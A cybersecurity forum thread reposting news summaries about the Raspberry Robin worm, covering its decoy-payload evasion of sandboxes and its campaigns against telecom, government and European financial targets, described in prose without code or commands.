Raspberry Robin worm drops fake malware to confuse researchers

silversurfer

Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Well-known
Aug 17, 2014
10,396
The Raspberry Robin malware is now trying its hand at some trickery by dropping a fake payload to confuse researchers and evade detection when it detects it's being run within sandboxes and debugging tools.

This new tactic was discovered by Trend Micro researchers who observed Raspberry Robin in recent attacks against telecommunication service providers and government systems.

Raspberry Robin is a worm-like malware dropper that sells initial access to compromised networks to ransomware gangs and malware operators. It has been previously associated with FIN11 and the Clop gang, as well as Bumblebee, IcedID, and TrueBot payload distribution.

The malware reaches targeted systems via malicious USB drives that infect the device with malware when inserted and included .LNK file is double-clicked.

When the shortcut is executed, it abuses the legitimate 'MSIExec.exe' Windows executable to download a malicious MSI installer that installs the Raspberry Robin payloads


Typical Raspberry Robin infection chain

Typical Raspberry Robin infection chain (Trend Micro)


 

silversurfer

Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Well-known
Aug 17, 2014
10,396
Financial and insurance sectors in Europe have been targeted by the Raspberry Robin worm, as the malware continues to evolve its post-exploitation capabilities while remaining under the radar.

"What is unique about the malware is that it is heavily obfuscated and highly complex to statically disassemble," Security Joes said in a new report published Monday.

The intrusions, observed against Spanish and Portuguese-speaking organizations, are notable for collecting more victim machine data than previously documented, with the malware now exhibiting sophisticated techniques to resist analysis.
 

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top